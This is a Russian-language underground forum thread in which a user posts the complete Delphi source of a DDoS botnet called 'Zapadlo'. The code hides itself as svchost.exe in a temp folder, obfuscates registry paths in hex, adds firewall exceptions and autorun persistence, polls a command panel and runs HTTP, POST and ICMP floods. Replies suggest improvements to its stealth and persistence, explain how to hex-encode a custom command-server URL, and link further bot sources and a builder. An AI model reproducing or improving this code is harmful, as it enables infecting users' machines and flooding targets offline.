Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!! |
|
Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
|
Опции темы | Опции просмотра |
28-10-2011 | #1 | |
Windows v.1.01
Последняя активность:
28-10-2011 Регистрация: 28.10.2011
Сообщений: 1
Поблагодарили всего: 0
за это сообщение: 0 |
Source Code DDoS BotNet "Zapadlo"
Source Code DDoS BotNet "Zapadlo" Данный бот так и не был реализован. Дабы не пропадать добру, выкладываю Source Code и соответственно Admin Panel. Думаю, народу, будет в чём поковыряться и над чем подумать. Сурс комментариев не требует, и так всё понятно до мелочей, а кому не понятно - вам тут делать не хрен. Авторы: C00LPack and me. Как вы наверное заметили, AP Должна быть в HEX.
Код:
program zapadlo; uses SysUtils, Classes, Windows, ShellAPI, Pingsend, Httpsend; type TNewThread = class(TThread) private protected procedure Execute; override; public end; var mThread: LongWord; admhex: string = 'AdminPanel'; WorkFolder: string; work: boolean; thread, i :integer; tip, port, target: string; postdata: string; const Packets: array[1..4] of integer = (128, 256, 512, 1024); Referers: array[1..20] of string = ( 'http://google.com/', 'http://yandex.ru/', 'http://gigporno.ru/', 'http://yahoo.com/', 'http://votrube.ru/', 'http://rambler.ru/', 'http://sex4porno.ru/', 'http://spaces.ru/', 'http://host-tracker.com/', 'http://forum.antichat.ru/', 'http://lenta.ru/', 'http://wikpedia.org/', 'http://hardcoreporn.com/', 'http://mail.ru/', 'http://vkontakte.ru/', 'http://upyachka.ru/', 'http://2ip.ru/', 'http://webmoney.ru/', 'http://live.com/', 'http://microsoft.com/'); UserAgents: array[1..27] of String = ( 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0)', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2)', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1)', 'Opera/7.51 (Windows NT 5.0; U) [en]', 'Opera/7.51 (Windows NT 5.1; U) [en]', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0', 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.9.168 Version/11.51', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.36 QQBrowser/6.3.8908.201', 'Opera/7.51 (Windows NT 5.2; U) [en]', 'Opera/7.51 (Windows NT 6.0; U) [en]', 'Opera/7.51 (Windows NT 6.1; U) [en]', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; ru) Opera 10.10', 'Opera/9.80 (X11; Linux x86_64; U; ru) Presto/2.2.15 Version/10.10', 'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.4) Gecko/2008111611 Gentoo Iceweasel/3.0.4', 'Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)', 'Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)', 'Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)', 'Googlebot', 'MSNBot', 'Yandex', 'StackRambler', 'Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2'); function HexToBin(Text, Buffer: PChar; BufSize: Integer): Integer; assembler; asm PUSH ESI PUSH EDI PUSH EBX MOV ESI,EAX MOV EDI,EDX MOV EBX,EDX MOV EDX,0 JMP @@1 @@0: DB 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,-1,-1,-1,-1,-1,-1 DB -1,10,11,12,13,14,15,-1,-1,-1,-1,-1,-1,-1,-1,-1 DB -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1 DB -1,10,11,12,13,14,15 @@1: LODSW CMP AL,"0" JB @@2 CMP AL,"f" JA @@2 MOV DL,AL MOV AL,@@0.Byte[EDX-"0"] CMP AL,-1 JE @@2 SHL AL,4 CMP AH,"0" JB @@2 CMP AH,"f" JA @@2 MOV DL,AH MOV AH,@@0.Byte[EDX-"0"] CMP AH,-1 JE @@2 OR AL,AH STOSB DEC ECX JNE @@1 @@2: MOV EAX,EDI SUB EAX,EBX POP EBX POP EDI POP ESI end; function HexToStr(s:pchar):string; begin SetLength(Result,StrLen(s)div 2); SetLength(Result, HexToBin(s, @result[1],StrLen(s)div 2)); end; function TempDir: string; var Dir: array[0..MAX_PATH - 1] of char; begin GetTempPath(SizeOf(Dir), Dir); Result := Dir; end; function SetTheReg(key:Hkey; subkey,name,value:string): boolean; var regKey:hkey; begin RegCreateKey(key,PChar(subkey),regKey); RegSetValueEx(regKey,Pchar(name),0,REG_SZ,pchar(value),length(value)); RegCloseKey(regKey); end; function StrToHex(source: String): String; var i:integer; c:Char; s:String; begin s := ''; for i:=1 to Length(source) do begin c := source[i]; s := s + IntToHex(Integer(c),2); end; result := s; end; {это будет стучать в админку} function ThreadFunc_MainThread( Parameter: Pointer): Integer; var http: THTTPSend; str: string; fucklist: TStringList; begin while True do begin try http:=THTTPSend.Create; fucklist:=TStringList.Create; http.UserAgent := UserAgents[1 + Random(27)]; http.HTTPMethod('GET', HexToStr(Pchar(admhex)) + 'bot.php?ver=1&country=Unknown'); http.Document.Clear; http.Headers.Clear; http.Free; Sleep(2000); HttpGetText(HexToStr(Pchar(admhex)) + 'command.txt', fucklist); str:=fucklist.Strings[0]; if (Pos('http',str)0) or (Pos('rndhttp',str)0) or (Pos('icmp',str)0) or (Pos('dwflood',str)0) or (Pos('post',str)0) or (Pos('visiturl',str)0) then begin tip:=Copy(str,1,Pos('=',str)-1); {} if tip='http' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; for i:=1 to thread do TNewThread.Create(false); //старт потоков end; end; //http {} if tip='rndhttp' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; for i:=1 to thread do TNewThread.Create(false); //старт потоков end; end; //http random flood {} if tip='icmp' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; for i:=1 to thread do TNewThread.Create(false); //старт потоков end; end; //icmp flood {} if tip='dwflood' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; for i:=1 to thread do TNewThread.Create(false); //старт потоков end; end; //dwflood {} if tip='visiturl' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; TNewThread.Create(false); //старт потокa end; end; {} if tip='post' then begin tip:=Copy(str,1,Pos('=',str)-1); Delete(str,1,Pos('=',str)); Target:=Copy(str,1,Pos('?',str)-1); Delete(str,1,Pos('?',str)); postdata:=Copy(str,1,Pos('|',str)-1); thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str))); Sleep(10000); if work=false then begin work:=true; for i:=1 to thread do TNewThread.Create(false); //старт потоков end; end; //posthttp end else begin work:=false; //вырубаем потоки end; except fucklist.Clear; http.Free; end; fucklist.Clear; sleep(300000); end;//цикл while end; { TNewThread - Код атаки } procedure TNewThread.Execute; var ping: TPINGSend; http: THTTPSend; begin inherited; while work do begin {} if tip='http' then begin try Randomize; http := THTTPSend.Create; http.UserAgent := UserAgents[1 + Random(27)]; http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]); http.Timeout := 5000; http.HTTPMethod('GET', target); http.Free; except http.Free; end; end; {} if tip='rndhttp' then begin try Randomize; http:=THTTPSend.Create; http.UserAgent := UserAgents[1 + Random(27)]; http.Timeout := (Random(10000)); http.KeepAliveTimeout := (Random(10000)); http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]); http.HTTPMethod('GET', target); Sleep(Random(100)); http.Free; except http.Free; end; end; {} if tip='visiturl' then begin try Randomize; http:=THTTPSend.Create; http.UserAgent := UserAgents[1 + Random(27)]; http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]); http.HTTPMethod('GET', target); http.Free; work:=false; except http.Free; end; end; {} if tip = 'icmp' then begin try Randomize; ping:=TPINGSend.Create; ping.Timeout := 2000; ping.PacketSize := Packets[1 + Random(4)]; ping.Ping(target); ping.Free; except ping.Free; end; end; {} if tip='dwflood' then begin try http := THTTPSend.Create; http.HTTPMethod('GET', target); http.Free; except http.Free; end; end; {} if tip='post' then begin try http := THTTPSend.Create; http.MimeType:='application/x-www-form-urlencoded'; http.UserAgent := UserAgents[1 + Random(27)]; http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]); http.Document.Write(pointer(postdata)^,length(postdata)); http.HTTPMethod('POST', target); http.Free; except http.Free; end; end; end; //цикл while end; {Основной Код} {} begin WorkFolder:= TempDir +'perflib\'; if (FileExists(WorkFolder +'svchost.exe')=false) then begin CreateDirectory(pchar(WorkFolder),nil); CopyFile(PChar(ParamStr(0)), pchar(WorkFolder +'svchost.exe'), true); sleep(1000); // SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List SetTheReg(HKEY_LOCAL_MACHINE, HexToStr('53595354454D5C436F6E74726F6C5365743030315C53657276696365735C5368617265644163636573735C506172616D65746572735C4669726577616C6C506F6C6963795C5374616E6461726450726F66696C655C417574686F72697A65644170706C69636174696F6E735C4C697374'), WorkFolder + 'svchost.exe', WorkFolder + HexToStr('737663686F73742E6578653A2A3A456E61626C65643A47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573')); // SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List SetTheReg(HKEY_LOCAL_MACHINE, HexToStr('53595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5368617265644163636573735C506172616D65746572735C4669726577616C6C506F6C6963795C5374616E6461726450726F66696C655C417574686F72697A65644170706C69636174696F6E735C4C697374'), WorkFolder + 'svchost.exe', WorkFolder + HexToStr('737663686F73742E6578653A2A3A456E61626C65643A47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573')); // Explorer Run SetTheReg(HKEY_CURRENT_USER, HexToStr('536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C506F6C69636965735C4578706C6F7265725C52756E'), HexToStr('47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573'), Workfolder + 'svchost.exe'); // Winlogon Run SetTheReg(HKEY_CURRENT_USER, HexToStr('536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E5C57696E6C6F676F6E'), HexToStr('5368656C6C'), 'explorer.exe,' + Workfolder + 'svchost.exe'); FileSetAttr(WorkFolder, $00000004 or $00000002); FileSetAttr(WorkFolder + 'svchost.exe', $00000004 or $00000002); ShellExecute(0, 'open', pchar(WorkFolder +'svchost.exe'), nil, nil, SW_NORMAL); Halt; end; if FileExists(WorkFolder +'svchost.exe') then begin SetLastError(0); sleep(3000); CreateMutex(nil, true, 'OXOOOOOOOEDD'); if GetLastError = ERROR_ALREADY_EXISTS then halt; BeginThread(nil, 1024, @ThreadFunc_MainThread, nil, 0, mThread); end; while (paramstr(0) = TempDir +'\perflib\svchost.exe')=false do begin sleep(100000); end; end. |
|
29-10-2011 | #2 | |
Заблокирован
Последняя активность:
11-01-2013 Регистрация: 24.09.2011
Сообщений: 662
Поблагодарили всего: 19
за это сообщение: 0
286-208
|
Последний раз редактировалось KpuMuHaJl; 31-10-2011 в 09:23. |
|
03-11-2011 | #3 | |
Windows 98
Последняя активность:
10 час(ов) назад Регистрация: 10.12.2010
Сообщений: 165
Поблагодарили всего: 2
за это сообщение: 0 |
.dcu файлы не находит)))
Приложил хоть, для приличия) |
|
03-11-2011 | #4 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
кому надо тот знает.
|
|
|
03-11-2011 | #5 |
|
Незнаю как бот, но код просто пиздец!
Последний раз редактировалось by_dmr; 03-11-2011 в 15:58. |
03-11-2011 | #6 | |
Windows v.1.01
Последняя активность:
03-11-2011 Регистрация: 03.11.2011
Сообщений: 1
Поблагодарили всего: 0
за это сообщение: 0 |
zapadlo, перезалей
|
|
03-11-2011 | #7 | |||||
Windows XP
Последняя активность:
22-04-2014 Регистрация: 19.11.2010
Сообщений: 270
Поблагодарили всего: 7
за это сообщение: 0 |
По скрину от криминала могу сказать что панель некая смесь между оптимой и русскилом.
Покритикую код: Цитата:
Цитата:
Дропается в /perflib/ которую создает в TEMP'е название - svchost.exe, ИМХО палево, не каждый день увидешь svchost.exe под юзером =\ Цитата:
Цитата:
Никаких проверок в боте, все ппц как уныло, пишется в Explorer/Run, даже проверок нет: удалось ли ему это сделать или нет. Сначало пишется в HKEY_LOCAL_MACHINE потом в HKEY_CURRENT_USER, имхо лучше наоборот, в случае если прав на HKEY_LOCAL_MACHINE не хватит - бота могут локнуть, а если он до этого успеет прописаться в автозапуск под юзером и скопироваться то есть шанс что после ребута бот все таки загрузится. Пора бы уже забить о Synapse это лишь оболочка WinSock, которая провоцирует на использование Classes и в итоге вес под 100кб, переписывайте под WinSock. SysUtils - ни к чему тут, выдерните все функции из SysUtils.pas в код и уменьшите вес еще на ~30 - 40 кб Последний раз редактировалось WestSide; 03-11-2011 в 12:02. |
|||||
03-11-2011 | #8 | ||
Windows XP
Последняя активность:
22-04-2014 Регистрация: 19.11.2010
Сообщений: 270
Поблагодарили всего: 7
за это сообщение: 0 |
Лень это плохо, вы хотели это в продажу пустить? - Тогда нужно было забыть о лени.
А что сложного то епть? Цитата:
|
||
03-11-2011 | #9 | |||
Windows XP
Последняя активность:
22-04-2014 Регистрация: 19.11.2010
Сообщений: 270
Поблагодарили всего: 7
за это сообщение: 0 |
Цитата:
Цитата:
var id:longword; i:integer; ThreadID:Integer begin for i:=1 to 33 do begin ThreadID[i]:=beginthread(0,Addr(процедура которая запустится в потоке),Addr(параметр),0,id); end; И дальше циклами обращаться ко всем потокам, можно сделать переменную которая будет хранить в себе общее кол-во потоков типо GlobalThread:Integer; и при создании новых потоков делать Inc(GlobalThread); при убийстве Dec(GlobalThread) |
|||
07-12-2011 | #10 | |
Windows v.3.1
Последняя активность:
04-03-2014 Регистрация: 12.11.2011
Сообщений: 55
Поблагодарили всего: 0
за это сообщение: 0 |
|
|
08-12-2011 | #11 | |
Windows v.1.01
Последняя активность:
09-06-2013 Регистрация: 19.04.2011
Сообщений: 4
Поблагодарили всего: 0
за это сообщение: 0 |
как он в админку стучит?
Последний раз редактировалось eclipse92; 08-12-2011 в 17:10. |
|
09-12-2011 | #12 | |
Заблокирован
Последняя активность:
11-01-2013 Регистрация: 24.09.2011
Сообщений: 662
Поблагодарили всего: 19
за это сообщение: 1
286-208
|
Ссыль зашифрована в хекс ввиде:
687474703A2F2F7A617061646C6F2E636C616E7465616D2E63 6F6D2F706667666C6B6A2F То есто если расшифровать получится следующее: [Ссылки могут видеть только зарегистрированные пользователи.] Заходим сюда: [Ссылки могут видеть только зарегистрированные пользователи.] Вписываем в поле ASCII нужную нам ссыль и папку, например: [Ссылки могут видеть только зарегистрированные пользователи.] И нажимаем ASCII to HEX. Получается слeдующее: 68:74:74:70:3a:2f:2f:46:75:63:6b:41:76:2e:72:75:2f :66:75:63:6b:2f Теперь удаляем эти не кому не нужные ":" и получаем: 687474703a2f2f4675636b41762e72752f6675636b2f Вставляем нашу зашифрованную в хексе ссылку в сорц комплим радуемся жизни ставим блеать мне спасибо!! |
|
|
29-01-2012 | #13 |
|
а кто ленивый может зашифровать строку здесь:
[Ссылки могут видеть только зарегистрированные пользователи.] |
06-04-2012 | #14 | |
|
Цитата:
Вообще правильные методы передачи данных свой клиент-сервер tcp установленный на серваке) палева меньше,накрайняк Irc. благо его сейчас мониторят никак почти),инфа проверенна я знаю что говорю
__________________ Слегка неадекватен. |
|
06-04-2012 | #15 | |
Windows v.1.01
Последняя активность:
2 недель(и) назад Регистрация: 06.04.2012
Сообщений: 7
Поблагодарили всего: 0
за это сообщение: 0 |
.dcu файлы не находит.что делать?
|
|
06-04-2012 | #16 | |
Заблокирован
Последняя активность:
18-06-2013 Регистрация: 03.11.2011
Сообщений: 314
Поблагодарили всего: 2
за это сообщение: 0 |
|
|
06-04-2012 | #17 | |
Windows 100500
Последняя активность:
28-10-2013 Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
кому надо тот знает.
|
|
|
07-04-2012 | #18 | |
Заблокирован
Последняя активность:
30-08-2012 Регистрация: 01.12.2011
Сообщений: 354
Поблагодарили всего: 10
за это сообщение: 0
510-916
|
При компиляции ошибочка В uses )
___________________________________ Проблема решена) Последний раз редактировалось websters; 07-04-2012 в 14:59. |
|
10-09-2013 | #19 | |
Администратор
Последняя активность:
1 день назад Регистрация: 16.02.2011
Сообщений: 1,732
Поблагодарили всего: 1,424
за это сообщение: 7 |
Re: Source Code DDoS BotNet "Zapadlo"
Дабы не плодить темы, запосчу тут.
Исходники Black Energy ddos bot. Скачать: [Ссылки могут видеть только зарегистрированные пользователи.]
__________________ "Водка взяла верх над ним." © gerry Мануал на тему: "Как получить пароль к криптору?" Обязательно к прочтению всем новичкам. Программы и сервисы, помогающие получить пароль к крипторам. Если кто-то решил пофлудить, предлагаю сначала ознакомиться с нашим банлистом. /banlist.php Халявный сканер файлов на детект (35 антивирусов). Крипторы Онлайн проверка на вирусы бесплатно. http://scanner.fuckav.ru/ Флуд, набивание постов, слив на вирустотал - бан.
|
|
|
10-09-2013 | #20 |
|
Re: Source Code DDoS BotNet "Zapadlo"
POCT,
|
07-11-2013 | #21 | |
Windows v.3.0
Последняя активность:
2 дн. назад Регистрация: 20.10.2012
Сообщений: 33
Поблагодарили всего: 15
за это сообщение: 1 |
Re: Source Code DDoS BotNet "Zapadlo"
Полезные ссылки.
Билдер с админкой. [Ссылки могут видеть только зарегистрированные пользователи.] Описание от лаб. Касперского. Шаг за шагом, защитная оболочка, инфектор и тд [Ссылки могут видеть только зарегистрированные пользователи.] |
|
|
07-11-2013 | #22 |
|
Re: Source Code DDoS BotNet "Zapadlo"
Если ты хотел вставить линк на билдер второй версии то поменяй линк, если первая то думаю не стоит заморачиваться.....
|
Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
Метки |
addr, analysis, ascii, begin, botnet, chernyy_ddo, code, ddo, globalthread, integer, pray, securelist, source, zapadlo, линк |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
Опции темы | |
Опции просмотра | |
|
|